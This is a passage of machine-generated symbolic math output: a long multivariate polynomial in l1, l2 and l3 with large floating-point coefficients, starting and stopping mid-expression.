2.95149958071588e+25*l1**6*l2**14 - 2.22094272293615e+34*l1**6*l2**13*l3**9 - 1.44613921857827e+34*l1**6*l2**13*l3**8 + 5.46101794263395e+31*l1**6*l2**13*l3**7 + 2.17627942459121e+31*l1**6*l2**13*l3**6 + 2.04051354236231e+30*l1**6*l2**13*l3**5 + 1.56318668578993e+30*l1**6*l2**13*l3**4 - 1.28956550319058e+28*l1**6*l2**13*l3**3 - 9.63603317311851e+27*l1**6*l2**13*l3**2 + 2.36453184279106e+25*l1**6*l2**13*l3 + 1.89384698088891e+25*l1**6*l2**13 + 1.28394121397882e+34*l1**6*l2**12*l3**10 + 1.45750823759225e+34*l1**6*l2**12*l3**9 - 9.69028414899963e+31*l1**6*l2**12*l3**8 - 8.11999476875e+31*l1**6*l2**12*l3**7 - 1.23706187367948e+30*l1**6*l2**12*l3**6 - 1.01429555802857e+30*l1**6*l2**12*l3**5 + 6.07126984600682e+27*l1**6*l2**12*l3**4 + 8.76442601323556e+27*l1**6*l2**12*l3**3 + 3.83064850786296e+25*l1**6*l2**12*l3**2 - 1.96673826282346e+25*l1**6*l2**12*l3 - 1.81467612236736e+23*l1**6*l2**12 - 2.85718376836187e+33*l1**6*l2**11*l3**11 - 1.45614395531057e+34*l1**6*l2**11*l3**10 + 1.14883997741448e+32*l1**6*l2**11*l3**9 + 1.28951424955019e+32*l1**6*l2**11*l3**8 + 1.15754376046266e+30*l1**6*l2**11*l3**7 + 5.11622590315946e+29*l1**6*l2**11*l3**6 - 2.50343580271998e+28*l1**6*l2**11*l3**5 - 1.14002719377633e+28*l1**6*l2**11*l3**4 + 1.45553523682352e+26*l1**6*l2**11*l3**3 + 6.17226783843751e+25*l1**6*l2**11*l3**2 - 3.04131789190164e+23*l1**6*l2**11*l3 - 1.1166400530353e+23*l1**6*l2**11 - 1.52648028627707e+34*l1**6*l2**10*l3**12 + 1.23967783328439e+34*l1**6*l2**10*l3**11 + 3.15935487681362e+31*l1**6*l2**10*l3**10 - 1.32867467998444e+32*l1**6*l2**10*l3**9 - 4.70999301050928e+28*l1**6*l2**10*l3**8 + 2.328760377918e+29*l1**6*l2**10*l3**7 + 6.32187538069056e+26*l1**6*l2**10*l3**6 + 3.25364408576186e+27*l1**6*l2**10*l3**5 + 4.19966539188342e+25*l1**6*l2**10*l3**4 - 1.99729981817677e+25*l1**6*l2**10*l3**3 - 4.04737088838812e+23*l1**6*l2**10*l3**2 + 1.23083638479184e+22*l1**6*l2**10*l3 + 8.79744788389333e+20*l1**6*l2**10 + 2.20073113357797e+34*l1**6*l2**9*l3**13 - 1.15509233182038e+34*l1**6*l2**9*l3**12 - 1.28803313838007e+32*l1**6*l2**9*l3**11 + 1.30248057437397e+32*l1**6*l2**9*l3**10 + 6.54198980700759e+29*l1**6*l2**9*l3**9 - 3.9350656111702e+29*l1**6*l2**9*l3**8 - 1.84290080377488e+28*l1**6*l2**9*l3**7 - 4.79742204968318e+27*l1**6*l2**9*l3**6 + 2.11579476246392e+26*l1**6*l2**9*l3**5 + 6.4293426666982e+25*l1**6*l2**9*l3**4 - 9.91135073500237e+23*l1**6*l2**9*l3**3 - 2.7417310731097e+23*l1**6*l2**9*l3**2 + 1.80777445706905e+21*l1**6*l2**9*l3 + 4.66658862824461e+20*l1**6*l2**9 - 2.57023119232537e+34*l1**6*l2**8*l3**14 + 9.1354440476951e+33*l1**6*l2**8*l3**13 + 2.27920670420241e+32*l1**6*l2**8*l3**12 - 1.00305831362937e+32*l1**6*l2**8*l3**11 - 2.80428044593024e+29*l1**6*l2**8*l3**10 + 5.75054029384804e+29*l1**6*l2**8*l3**9 - 8.81427232619244e+27*l1**6*l2**8*l3**8 - 3.12990496289431e+27*l1**6*l2**8*l3**7 + 1.18190116541534e+26*l1**6*l2**8*l3**6 + 1.8586262861791e+25*l1**6*l2**8*l3**5 - 8.40329770348392e+23*l1**6*l2**8*l3**4 - 1.19136673713407e+23*l1**6*l2**8*l3**3 + 2.73380545358315e+21*l1**6*l2**8*l3**2 + 2.83187702349598e+20*l1**6*l2**8*l3 - 2.93072342204869e+18*l1**6*l2**8 + 1.83949894751032e+34*l1**6*l2**7*l3**15 - 7.16173237315819e+33*l1**6*l2**7*l3**14 - 1.77082803741353e+32*l1**6*l2**7*l3**13 + 7.19610913346039e+31*l1**6*l2**7*l3**12 + 5.88265780241448e+29*l1**6*l2**7*l3**11 - 2.595458499285e+29*l1**6*l2**7*l3**10 - 1.02702622509971e+28*l1**6*l2**7*l3**9 - 1.70986008521796e+27*l1**6*l2**7*l3**8 + 1.71110472541132e+26*l1**6*l2**7*l3**7 + 4.24478744491135e+25*l1**6*l2**7*l3**6 - 1.2951975611961e+24*l1**6*l2**7*l3**5 - 3.03991558760869e+23*l1**6*l2**7*l3**4 + 4.58563499863482e+21*l1**6*l2**7*l3**3 + 1.00542466733085e+21*l1**6*l2**7*l3**2 - 6.09997104520769e+18*l1**6*l2**7*l3 - 1.27326578210354e+18*l1**6*l2**7 - 1.19975217061376e+34*l1**6*l2**6*l3**16 + 4.03827555376573e+33*l1**6*l2**6*l3**15 + 1.10235960043515e+32*l1**6*l2**6*l3**14 - 2.81908090957851e+31*l1**6*l2**6*l3**13 + 4.09601841992105e+29*l1**6*l2**6*l3**12 + 5.6631008688469e+28*l1**6*l2**6*l3**11 - 1.39627591533171e+28*l1**6*l2**6*l3**10 - 2.20262784501765e+27*l1**6*l2**6*l3**9 + 1.62907793543135e+26*l1**6*l2**6*l3**8 + 3.20559878795587e+25*l1**6*l2**6*l3**7 - 1.1833906541471e+24*l1**6*l2**6*l3**6 - 2.47286600696104e+23*l1**6*l2**6*l3**5 + 4.955476752637e+21*l1**6*l2**6*l3**4 + 9.28181520729046e+20*l1**6*l2**6*l3**3 - 9.07258180595506e+18*l1**6*l2**6*l3**2 - 1.15586295084779e+18*l1**6*l2**6*l3 + 4.44953604775964e+15*l1**6*l2**6 + 4.88809514939534e+33*l1**6*l2**5*l3**17 - 1.82394046581207e+33*l1**6*l2**5*l3**16 - 2.07104187180266e+31*l1**6*l2**5*l3**15 - 4.64031404103445e+30*l1**6*l2**5*l3**14 - 6.78364806157631e+29*l1**6*l2**5*l3**13 + 3.57421292148852e+29*l1**6*l2**5*l3**12 + 2.84888291792453e+27*l1**6*l2**5*l3**11 - 3.53230986863896e+27*l1**6*l2**5*l3**10 + 7.05833064886786e+25*l1**6*l2**5*l3**9 + 3.41675678096506e+25*l1**6*l2**5*l3**8 - 1.00076046622269e+24*l1**6*l2**5*l3**7 - 2.57370974978932e+23*l1**6*l2**5*l3**6 + 5.3063933832303e+21*l1**6*l2**5*l3**5 + 1.1528621207108e+21*l1**6*l2**5*l3**4 - 1.24433865537428e+19*l1**6*l2**5*l3**3 - 2.38885608668798e+18*l1**6*l2**5*l3**2 + 9.22782128359086e+15*l1**6*l2**5*l3 + 1.3848102705636e+15*l1**6*l2**5 - 2.03398552137292e+33*l1**6*l2**4*l3**18 + 1.94147863161807e+32*l1**6*l2**4*l3**17 - 9.83165634645037e+30*l1**6*l2**4*l3**16 + 2.53771269098277e+31*l1**6*l2**4*l3**15 + 1.08905138314239e+30*l1**6*l2**4*l3**14 - 4.8002991952314e+29*l1**6*l2**4*l3**13 - 1.74740819187266e+28*l1**6*l2**4*l3**12 + 1.99520509284184e+27*l1**6*l2**4*l3**11 + 1.64928414482194e+26*l1**6*l2**4*l3**10 + 1.03668203718343e+25*l1**6*l2**4*l3**9 - 1.0909388290949e+24*l1**6*l2**4*l3**8 - 1.87624403029613e+23*l1**6*l2**4*l3**7 + 4.99975480660931e+21*l1**6*l2**4*l3**6 + 1.01188938794649e+21*l1**6*l2**4*l3**5 - 1.26451670945335e+19*l1**6*l2**4*l3**4 - 2.29070355794066e+18*l1**6*l2**4*l3**3 + 1.25921934013283e+16*l1**6*l2**4*l3**2 + 1.4990861412902e+15*l1**6*l2**4*l3 - 2365536275496.67*l1**6*l2**4 + 4.66421292881234e+32*l1**6*l2**3*l3**19 + 2.54666025913158e+32*l1**6*l2**3*l3**18 + 1.43415976498461e+31*l1**6*l2**3*l3**17 - 2.55716217108821e+31*l1**6*l2**3*l3**16 - 6.5076522402903e+29*l1**6*l2**3*l3**15 + 5.07594696446943e+29*l1**6*l2**3*l3**14 + 7.48730996354955e+27*l1**6*l2**3*l3**13 - 4.48053450689915e+27*l1**6*l2**3*l3**12 - 1.95622829480809e+25*l1**6*l2**3*l3**11 + 3.00862063774624e+25*l1**6*l2**3*l3**10 - 3.22105499329374e+23*l1**6*l2**3*l3**9 - 1.74777450956453e+23*l1**6*l2**3*l3**8 + 3.08456201440521e+21*l1**6*l2**3*l3**7 + 8.21821106329251e+20*l1**6*l2**3*l3**6 - 1.05976294637996e+19*l1**6*l2**3*l3**5 - 2.15853725903953e+18*l1**6*l2**3*l3**4 + 1.4249604203671e+16*l1**6*l2**3*l3**3 + 2.13946727731121e+15*l1**6*l2**3*l3**2 - 4425842063832.53*l1**6*l2**3*l3 - 336516612094.861*l1**6*l2**3 - 2.38263543780164e+32*l1**6*l2**2*l3**20 - 2.56764921731122e+32*l1**6*l2**2*l3**19 - 4.71255411578853e+30*l1**6*l2**2*l3**18 + 1.59471223998076e+31*l1**6*l2**2*l3**17 + 3.68637565713763e+29*l1**6*l2**2*l3**16 - 3.0900016169035e+29*l1**6*l2**2*l3**15 - 8.25248604622733e+27*l1**6*l2**2*l3**14 + 2.32465482341802e+27*l1**6*l2**2*l3**13 + 9.39677487826799e+25*l1**6*l2**2*l3**12 - 5.93596561593219e+24*l1**6*l2**2*l3**11 - 6.71855135686782e+23*l1**6*l2**2*l3**10 - 5.16846486548326e+22*l1**6*l2**2*l3**9 + 3.12058215130715e+21*l1**6*l2**2*l3**8 + 4.79030008130949e+20*l1**6*l2**2*l3**7 - 8.69901210994849e+18*l1**6*l2**2*l3**6 - 1.51880250587069e+18*l1**6*l2**2*l3**5 + 1.21769385582496e+16*l1**6*l2**2*l3**4 + 1.82608721188272e+15*l1**6*l2**2*l3**3 - 5219441330450.81*l1**6*l2**2*l3**2 - 432664215550.535*l1**6*l2**2*l3 + 138035375.397214*l1**6*l2**2 + 6.19674003399356e+31*l1**6*l2*l3**21 + 9.37506798691287e+31*l1**6*l2*l3**20 + 6.69537235306428e+27*l1**6*l2*l3**19 - 6.16921318573123e+30*l1**6*l2*l3**18 - 6.60011373426194e+28*l1**6*l2*l3**17 + 1.40839115242606e+29*l1**6*l2*l3**16 + 1.64982193925232e+27*l1**6*l2*l3**15 - 1.57971936104468e+27*l1**6*l2*l3**14 - 1.33667535283562e+25*l1**6*l2*l3**13 + 1.2247426880231e+25*l1**6*l2*l3**12 + 5.23875635068205e+21*l1**6*l2*l3**11 - 6.90967627202699e+22*l1**6*l2*l3**10 + 5.64878066407306e+20*l1**6*l2*l3**9 + 3.05142532375307e+20*l1**6*l2*l3**8 - 3.29653227892239e+18*l1**6*l2*l3**7 - 8.58582277984e+17*l1**6*l2*l3**6 + 7.19711199650386e+15*l1**6*l2*l3**5 + 1.15553142919054e+15*l1**6*l2*l3**4 - 4425842063832.53*l1**6*l2*l3**3 - 432664215550.523*l1**6*l2*l3**2 - 92023583.5980566*l1**6*l2*l3 - 69017687.6985886*l1**6*l2 - 1.91363974168048e+31*l1**6*l3**22 - 1.65412979939667e+31*l1**6*l3**21 + 2.39309016225985e+29*l1**6*l3**20 + 1.16039925169264e+30*l1**6*l3**19 + 1.69577076917186e+28*l1**6*l3**18 - 2.8806034878944e+28*l1**6*l3**17 - 9.50893728871083e+26*l1**6*l3**16 + 2.84128047815938e+26*l1**6*l3**15 + 1.63389456368886e+25*l1**6*l3**14 - 1.2489211550467e+24*l1**6*l3**13 - 1.60192998700639e+23*l1**6*l3**12 - 5.04204277696327e+21*l1**6*l3**11 + 8.99078569097963e+20*l1**6*l3**10 + 7.46055475190992e+19*l1**6*l3**9 - 2.7732150279021e+18*l1**6*l3**8 - 3.02453171927743e+17*l1**6*l3**7 + 4.36648507914388e+15*l1**6*l3**6 + 590308188211613.0*l1**6*l3**5 - 2365536275496.72*l1**6*l3**4 - 336516612094.841*l1**6*l3**3 - 46011791.7989923*l1**6*l3**2 - 27607075.0794247*l1**6*l3 - 485280.616630749*l1**6 - 3.6697865792712e+31*l1**5*l2**23 + 1.69420972434772e+32*l1**5*l2**22*l3 - 2.21678834280584e+31*l1**5*l2**22 - 1.80016408514402e+32*l1**5*l2**21*l3**2 + 1.29082092804882e+32*l1**5*l2**21*l3 + 3.5402630430144e+30*l1**5*l2**21 - 8.82313612366984e+31*l1**5*l2**20*l3**3 - 2.73381180290016e+32*l1**5*l2**20*l3**2 - 1.06921098973073e+31*l1**5*l2**20*l3 + 2.00587833027718e+30*l1**5*l2**20 + 1.081320030663e+33*l1**5*l2**19*l3**4 + 1.9939510270673e+32*l1**5*l2**19*l3**3 + 1.75652711290955e+31*l1**5*l2**19*l3**2 - 8.87890864579304e+30*l1**5*l2**19*l3 - 1.11529805958294e+29*l1**5*l2**19 - 9.51110753066988e+32*l1**5*l2**18*l3**5 + 9.2193998804137e+32*l1**5*l2**18*l3**4 - 9.79725047756335e+30*l1**5*l2**18*l3**3 + 2.21920064162695e+31*l1**5*l2**18*l3**2 + 2.34747887559341e+29*l1**5*l2**18*l3 - 6.19204865788638e+28*l1**5*l2**18 - 1.69544139962329e+33*l1**5*l2**17*l3**6 - 3.62374362971754e+33*l1**5*l2**17*l3**5 - 1.39768144332104e+31*l1**5*l2**17*l3**4 - 3.37282364762902e+31*l1**5*l2**17*l3**3 - 4.05214034487976e+29*l1**5*l2**17*l3**2 + 2.188009804746e+29*l1**5*l2**17*l3 + 1.5869920034207e+27*l1**5*l2**17 + 1.07535094864101e+34*l1**5*l2**16*l3**7 + 8.16522945584051e+33*l1**5*l2**16*l3**6 + 1.94676438073359e+31*l1**5*l2**16*l3**5 + 2.65886118701797e+31*l1**5*l2**16*l3**4 + 1.05824714529456e+29*l1**5*l2**16*l3**3 - 5.32884329206925e+29*l1**5*l2**16*l3**2 - 1.61552507958229e+27*l1**5*l2**16*l3 + 9.15534702634164e+26*l1**5*l2**16 - 2.39977086768059e+34*l1**5*l2**15*l3**8 - 1.28146584954589e+34*l1**5*l2**15*l3**7 + 3.57261199774041e+31*l1**5*l2**15*l3**6 + 1.11403735727595e+31*l1**5*l2**15*l3**5 + 1.95276141064335e+29*l1**5*l2**15*l3**4 + 7.7528352597932e+29*l1**5*l2**15*l3**3 + 3.20203429796388e+27*l1**5*l2**15*l3**2 - 2.34508108993465e+27*l1**5*l2**15*l3 - 1.59019049019647e+25*l1**5*l2**15 + 4.10153671792998e+34*l1**5*l2**14*l3**9 + 1.59564806532585e+34*l1**5*l2**14*l3**8 - 1.97351506403868e+32*l1**5*l2**14*l3**7 - 7.48078777442748e+31*l1**5*l2**14*l3**6 - 5.55551223022171e+29*l1**5*l2**14*l3**5 - 8.34827437397543e+29*l1**5*l2**14*l3**4 + 3.40260211453766e+27*l1**5*l2**14*l3**3 + 5.44671778133318e+27*l1**5*l2**14*l3**2 + 2.8533701275103e+23*l1**5*l2**14*l3 - 9.17298925106496e+24*l1**5*l2**14 - 5.42160337156934e+34*l1**5*l2**13*l3**10 - 1.51802640034359e+34*l1**5*l2**13*l3**9 + 4.13542444844677e+32*l1**5*l2**13*l3**8 + 1.30961931849196e+32*l1**5*l2**13*l3**7 - 2.31235353349236e+29*l1**5*l2**13*l3**6 + 4.616928017652e+29*l1**5*l2**13*l3**5 - 2.80887479744172e+27*l1**5*l2**13*l3**4 - 6.14594996665118e+27*l1**5*l2**13*l3**3 - 2.36298788344061e+25*l1**5*l2**13*l3**2 + 1.47910306615748e+25*l1**5*l2**13*l3 + 1.06275050695241e+23*l1**5*l2**13 + 6.37303567264885e+34*l1**5*l2**12*l3**11 + 1.09892937789132e+34*l1**5*l2**12*l3**10 - 6.4526547303366e+32*l1**5*l2**12*l3**9 - 1.51913178489319e+32*l1**5*l2**12*l3**8 + 1.50307217099668e+30*l1**5*l2**12*l3**7 + 1.39611542039713e+28*l1**5*l2**12*l3**6 + 9.12114848715759e+27*l1**5*l2**12*l3**5 + 6.82769837176299e+27*l1**5*l2**12*l3**4 - 5.67491650204607e+25*l1**5*l2**12*l3**3 - 3.71395514155325e+25*l1**5*l2**12*l3**2 + 9.96101219598344e+22*l1**5*l2**12*l3 + 5.88570161366326e+22*l1**5*l2**12 - 6.45493854497986e+34*l1**5*l2**11*l3**12 - 4.04571709348398e+33*l1**5*l2**11*l3**11 + 7.83110361006021e+32*l1**5*l2**11*l3**10 + 1.16583288015746e+32*l1**5*l2**11*l3**9 - 3.50815529021622e+30*l1**5*l2**11*l3**8 - 4.62467056049046e+29*l1**5*l2**11*l3**7 + 3.78522797853433e+27*l1**5*l2**11*l3**6 - 2.70614976691524e+27*l1**5*l2**11*l3**5 - 6.22804230651291e+24*l1**5*l2**11*l3**4 + 2.511284889338e+25*l1**5*l2**11*l3**3 + 1.93734096416785e+23*l1**5*l2**11*l3**2 - 3.63001618184105e+22*l1**5*l2**11*l3 - 5.70598480839827e+20*l1**5*l2**11 + 6.03871761049229e+34*l1**5*l2**10*l3**13 - 2.48981516406165e+33*l1**5*l2**10*l3**12 - 8.29749954890612e+32*l1**5*l2**10*l3**11 - 4.85211360182535e+31*l1**5*l2**10*l3**10 + 4.6608009923518e+30*l1**5*l2**10*l3**9 + 4.61235173723586e+29*l1**5*l2**10*l3**8 - 4.86377567802644e+27*l1**5*l2**10*l3**7 + 1.70763048691608e+27*l1**5*l2**10*l3**6 - 8.88287412071303e+25*l1**5*l2**10*l3**5 - 3.91008371841435e+25*l1**5*l2**10*l3**4 + 4.60728709610527e+23*l1**5*l2**10*l3**3 + 1.62725798457502e+23*l1**5*l2**10*l3**2 - 8.31442317908615e+20*l1**5*l2**10*l3 - 2.74433531521608e+20*l1**5*l2**10 - 4.91147174038381e+34*l1**5*l2**9*l3**14 + 7.2464378115261e+33*l1**5*l2**9*l3**13 + 7.40896468598461e+32*l1**5*l2**9*l3**12 - 2.69342713128952e+31*l1**5*l2**9*l3**11 - 5.22008426007105e+30*l1**5*l2**9*l3**10 - 2.50145818948194e+29*l1**5*l2**9*l3**9 + 2.12953122245277e+28*l1**5*l2**9*l3**8 + 1.67260391841973e+27*l1**5*l2**9*l3**7 - 6.23653938257214e+25*l1**5*l2**9*l3**6 + 1.04956236790855e+24*l1**5*l2**9*l3**5 + 3.44758980274481e+23*l1**5*l2**9*l3**4 + 5.92688643026602e+21*l1**5*l2**9*l3**3 - 1.45150465409969e+21*l1**5*l2**9*l3**2 - 5.56178617306806e+19*l1**5*l2**9*l3 + 2.21966850628888e+18*l1**5*l2**9 + 3.59392598277978e+34*l1**5*l2**8*l3**15 - 8.57361461356468e+33*l1**5*l2**8*l3**14 - 5.82043700933333e+32*l1**5*l2**8*l3**13 + 7.03536191661397e+31*l1**5*l2**8*l3**12 + 4.35127140039523e+30*l1**5*l2**8*l3**11 - 1.19901180577507e+29*l1**5*l2**8*l3**10 - 1.50741311819191e+28*l1**5*l2**8*l3**9 + 4.65749313948516e+26*l1**5*l2**8*l3**8 - 4.03223139393436e+25*l1**5*l2**8*l3**7 - 2.01606064136538e+25*l1**5*l2**8*l3**6 + 6.08322248060021e+23*l1**5*l2**8*l3**5 + 1.65369516102014e+23*l1**5*l2**8*l3**4 - 2.44483634322438e+21*l1**5*l2**8*l3**3 - 5.9928272926073e+20*l1**5*l2**8*l3**2 + 3.54597450869932e+18*l1**5*l2**8*l3 + 8.90797579951053e+17*l1**5*l2**8 - 2.17688812129663e+34*l1**5*l2**7*l3**16 + 7.4372874098311e+33*l1**5*l2**7*l3**15 + 3.72056961062164e+32*l1**5*l2**7*l3**14 - 7.65073462566724e+31*l1**5*l2**7*l3**13 - 3.06788531138466e+30*l1**5*l2**7*l3**12 + 2.28771322199187e+29*l1**5*l2**7*l3**11 + 1.87054005183349e+28*l1**5*l2**7*l3**10 + 7.25907333302174e+26*l1**5*l2**7*l3**9 - 9.91298732504876e+25*l1**5*l2**7*l3**8 - 1.33431993407786e+25*l1**5*l2**7*l3**7 + 5.95433057949207e+23*l1**5*l2**7*l3**6 + 1.00198644749821e+23*l1**5*l2**7*l3**5 - 2.6767165725586e+21*l1**5*l2**7*l3**4 - 4.12762056633081e+20*l1**5*l2**7*l3**3 + 5.82672861086844e+18*l1**5*l2**7*l3**2 + 5.13214053012778e+17*l1**5*l2**7*l3 - 3.97282779664556e+15*l1**5*l2**7 + 1.1328207150853e+34*l1**5*l2**6*l3**17 - 4.76816657446326e+33*l1**5*l2**6*l3**16 - 1.95349655421926e+32*l1**5*l2**6*l3**15 + 5.03354484551013e+31*l1**5*l2**6*l3**14 + 1.37993460352166e+30*l1**5*l2**6*l3**13 - 1.61765442293761e+29*l1**5*l2**6*l3**12 - 3.79439135307102e+27*l1**5*l2**6*l3**11 + 8.13441573699058e+26*l1**5*l2**6*l3**10 - 4.066469537948e+25*l1**5*l2**6*l3**9 - 1.23666914864877e+25*l1**5*l2**6*l3**8 + 5.43081009244794e+23*l1**5*l2**6*l3**7 + 1.30388181821312e+23*l1**5*l2**6*l3**6 - 3.09242047756326e+21*l1**5*l2**6*l3**5 - 6.6993868198567e+20*l1**5*l2**6*l3**4 + 8.26355166876956e+18*l1**5*l2**6*l3**3 + 1.67133966699862e+18*l1**5*l2**6*l3**2 - 6.98297529949214e+15*l1**5*l2**6*l3 - 1.21433303841795e+15*l1**5*l2**6 - 4.5437207614847e+33*l1**5*l2**5*l3**18 + 2.32662601421482e+33*l1**5*l2**5*l3**17 + 7.34066720668044e+31*l1**5*l2**5*l3**16 - 1.82780537656266e+31*l1**5*l2**5*l3**15 - 3.43674055981306e+29*l1**5*l2**5*l3**14 - 9.03026999331189e+28*l1**5*l2**5*l3**13 + 1.29665370088835e+27*l1**5*l2**5*l3**12 + 1.48301906996721e+27*l1**5*l2**5*l3**11 - 2.76404450313692e+25*l1**5*l2**5*l3**10 - 1.45339175487752e+25*l1**5*l2**5*l3**9 + 4.33961587846006e+23*l1**5*l2**5*l3**8 + 1.08842394135102e+23*l1**5*l2**5*l3**7 - 2.85787082396721e+21*l1**5*l2**5*l3**6 - 5.79508126470154e+20*l1**5*l2**5*l3**5 + 8.66147372642436e+18*l1**5*l2**5*l3**4 + 1.43503283937867e+18*l1**5*l2**5*l3**3 - 1.0144082595209e+16*l1**5*l2**5*l3**2 - 1.02286339287386e+15*l1**5*l2**5*l3 + 2472366946003.0*l1**5*l2**5 + 1.58855318667134e+33*l1**5*l2**4*l3**19 - 7.11000958335831e+32*l1**5*l2**4*l3**18 - 1.96121741677353e+31*l1**5*l2**4*l3**17 - 3.80453078942707e+30*l1**5*l2**4*l3**16 - 2.15294502317014e+29*l1**5*l2**4*l3**15 + 2.37978072628888e+29*l1**5*l2**4*l3**14 + 6.73777245757971e+27*l1**5*l2**4*l3**13 - 1.61552715890726e+27*l1**5*l2**4*l3**12 - 7.67626501267645e+25*l1**5*l2**4*l3**11 + 1.04686655128701e+24*l1**5*l2**4*l3**10 + 5.40048563880501e+23*l1**5*l2**4*l3**9 + 7.26918059377706e+22*l1**5*l2**4*l3**8 - 2.74794491161365e+21*l1**5*l2**4*l3**7 - 5.28965949221355e+20*l1**5*l2**4*l3**6 + 8.70241250393277e+18*l1**5*l2**4*l3**5 + 1.64226428768765e+18*l1**5*l2**4*l3**4 - 1.2588915681055e+16*l1**5*l2**4*l3**3 - 1.94009994168601e+15*l1**5*l2**4*l3**2 + 4441103588190.66*l1**5*l2**4*l3 + 391458099783.806*l1**5*l2**4 - 4.34549171201018e+32*l1**5*l2**3*l3**20 + 6.92635619928621e+31*l1**5*l2**3*l3**19 + 3.2519735488291e+30*l1**5*l2**3*l3**18 + 9.92046196605888e+30*l1**5*l2**3*l3**17 + 1.86819460445773e+29*l1**5*l2**3*l3**16 - 2.66498697946481e+29*l1**5*l2**3*l3**15 - 3.91248483756877e+27*l1**5*l2**3*l3**14 + 2.565024282848e+27*l1**5*l2**3*l3**13 + 2.60401710885214e+25*l1**5*l2**3*l3**12 - 1.67913367699929e+25*l1**5*l2**3*l3**11 + 3.33844282667301e+22*l1**5*l2**3*l3**10 + 8.42108313319592e+22*l1**5*l2**3*l3**9 - 1.27457558369828e+21*l1**5*l2**3*l3**8 - 4.0215183444144e+20*l1**5*l2**3*l3**7 + 6.21428032861923e+18*l1**5*l2**3*l3**6 + 1.27643328069732e+18*l1**5*l2**3*l3**5 - 1.16057150117421e+16*l1**5*l2**3*l3**4 - 1.6921346323744e+15*l1**5*l2**3*l3**3 + 5906209926562.57*l1**5*l2**3*l3**2 + 453267273433.878*l1**5*l2**3*l3 - 92023583.5981671*l1**5*l2**3 + 1.51309288464449e+32*l1**5*l2**2*l3**21 + 6.66399422204071e+31*l1**5*l2**2*l3**20 - 1.47059901299735e+30*l1**5*l2**2*l3**19 - 6.96911779427903e+30*l1**5*l2**2*l3**18 - 9.80388234682895e+28*l1**5*l2**2*l3**17 + 1.65843566498847e+29*l1**5*l2**2*l3**16 + 3.39641196413002e+27*l1**5*l2**2*l3**15 - 1.54592869921801e+27*l1**5*l2**2*l3**14 - 4.57042225096319e+25*l1**5*l2**2*l3**13 + 7.16581700046432e+24*l1**5*l2**2*l3**12 + 3.60844951025083e+23*l1**5*l2**2*l3**11 + 5.74753979331179e+21*l1**5*l2**2*l3**10 - 1.80994851236658e+21*l1**5*l2**2*l3**9 - 2.08465568182671e+20*l1**5*l2**2*l3**8 + 5.63168630152097e+18*l1**5*l2**2*l3**7 + 8.80585865522031e+17*l1**5*l2**2*l3**6 - 9.60893705424529e+15*l1**5*l2**2*l3**5 - 1.47002984354327e+15*l1**5*l2**2*l3**4 + 5906209926562.81*l1**5*l2**2*l3**3 + 618091736500.764*l1**5*l2**2*l3**2 + 552141501.588562*l1**5*l2**2*l3 + 165642450.476587*l1**5*l2**2 - 4.06957625888369e+31*l1**5*l2*l3**22 - 3.31325696978851e+31*l1**5*l2*l3**21 + 1.03897260017181e+30*l1**5*l2*l3**20 + 2.68176393173397e+30*l1**5*l2*l3**19 + 7.25694066616602e+27*l1**5*l2*l3**18 - 6.9218930850196e+28*l1**5*l2*l3**17 - 6.94063234827424e+26*l1**5*l2*l3**16 + 8.38011570980274e+26*l1**5*l2*l3**15 + 9.04107284934129e+24*l1**5*l2*l3**14 - 6.75509194479341e+24*l1**5*l2*l3**13 - 4.24023499757339e+22*l1**5*l2*l3**12 + 3.66441360668178e+22*l1**5*l2*l3**11 - 8.16722527700673e+19*l1**5*l2*l3**10 - 1.57102673098499e+20*l1**5*l2*l3**9 + 1.46808738819964e+18*l1**5*l2*l3**8 + 4.84331705265705e+17*l1**5*l2*l3**7 - 4.88149495354582e+15*l1**5*l2*l3**6 - 798625777611347.0*l1**5*l2*l3**5 + 4441103588190.56*l1**5*l2*l3**4 + 453267273433.894*l1**5*l2*l3**3 - 7.6171875e-5*l1**5*l2*l3**2 + 82821225.2382988*l1**5*l2*l3 + 1455841.84989226*l1**5*l2 + 8.50562639074549e+30*l1**5*l3**23 + 6.01728898462207e+30*l1**5*l3**22 - 2.70930786261476e+29*l1**5*l3**21 - 4.8220797209449e+29*l1**5*l3**20 - 1.01858604835534e+27*l1**5*l3**19 + 1.34475077846589e+28*l1**5*l3**18 + 3.14113764741508e+26*l1**5*l3**17 - 1.58923741117244e+26*l1**5*l3**16 - 6.68597933756633e+24*l1**5*l3**15 + 1.01775849107669e+24*l1**5*l3**14 + 7.69237921588966e+22*l1**5*l3**13 - 5.32656617086528e+20*l1**5*l3**12 - 5.00589657863191e+20*l1**5*l3**11 - 2.90530612016093e+19*l1**5*l3**10 + 1.80887320938484e+18*l1**5*l3**9 + 1.66298415787594e+17*l1**5*l3**8 - 3.48077735251492e+15*l1**5*l3**7 - 457203891943047.0*l1**5*l3**6 + 2472366946003.03*l1**5*l3**5 + 391458099783.802*l1**5*l3**4 + 184047167.196169*l1**5*l3**3 + 41410612.6191407*l1**5*l3**2 - 727920.924946051*l1**5*l3 - 327564.416225743*l1**5 + 1.13475656536474e+31*l1**4*l2**24 - 4.72226319794803e+31*l1**4*l2**23*l3 + 6.24444221167462e+30*l1**4*l2**23 + 1.02319909163453e+31*l1**4*l2**22*l3**2 - 3.27827537282242e+31*l1**4*l2**22*l3 - 1.18036147003255e+30*l1**4*l2**22 + 3.0922621191138e+32*l1**4*l2**21*l3**3 + 3.79050589982595e+31*l1**4*l2**21*l3**2 + 4.15257084810266e+30*l1**4*l2**21*l3 - 6.17109941631215e+29*l1**4*l2**21 - 1.19598193182963e+33*l1**4*l2**20*l3**4 + 1.90299887495543e+32*l1**4*l2**20*l3**3 - 7.10532875224425e+30*l1**4*l2**20*l3**2 + 2.9299171228696e+30*l1**4*l2**20*l3 + 4.0467825532255e+28*l1**4*l2**20 + 2.1016166088407e+33*l1**4*l2**19*l3**5 - 1.20074331586113e+33*l1**4*l2**19*l3**4 + 2.31140732377269e+30*l1**4*l2**19*l3**3 - 7.10189961421341e+30*l1**4*l2**19*l3**2 - 1.13588337579282e+29*l1**4*l2**19*l3 + 2.07178714911524e+28*l1**4*l2**19 - 1.81709962018315e+33*l1**4*l2**18*l3**6 + 3.64088461223092e+33*l1**4*l2**18*l3**5 + 1.45874119694271e+31*l1**4*l2**18*l3**4 + 7.99202019623584e+30*l1**4*l2**18*l3**3 + 2.12095736646235e+29*l1**4*l2**18*l3**2 - 8.40371254375774e+28*l1**4*l2**18*l3 - 6.24577669323256e+26*l1**4*l2**18 - 1.64296900417415e+33*l1**4*l2**17*l3**7 - 7.90286747859483e+33*l1**4*l2**17*l3**6 - 3.02762623736583e+31*l1**4*l2**17*l3**5 + 